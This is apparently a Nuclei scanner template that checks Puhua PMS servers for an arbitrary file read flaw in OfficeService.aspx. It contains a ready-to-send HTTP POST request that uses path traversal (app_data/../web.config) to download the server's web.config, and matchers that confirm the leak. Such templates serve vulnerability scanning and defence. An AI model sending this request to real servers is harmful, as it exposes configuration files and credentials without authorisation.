id: puhuaPMS-OfficeService_aspx-File-reading

info:
  name: 普华PMS OfficeService.aspx 任意文件读取漏洞
  author: puhuaPMS
  severity: high
  tags: puhuaPMS

http:
  - raw:
      - |
        POST /PowerPlat/FormXml/DocFile/OfficeService.aspx HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        action=download&WEBURL=app_data/../web.config
    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - 'http://go.microsoft.com'
          - '<configuration>'
          - '</configuration>'
        condition: and
      - type: status
        status: 
          - 200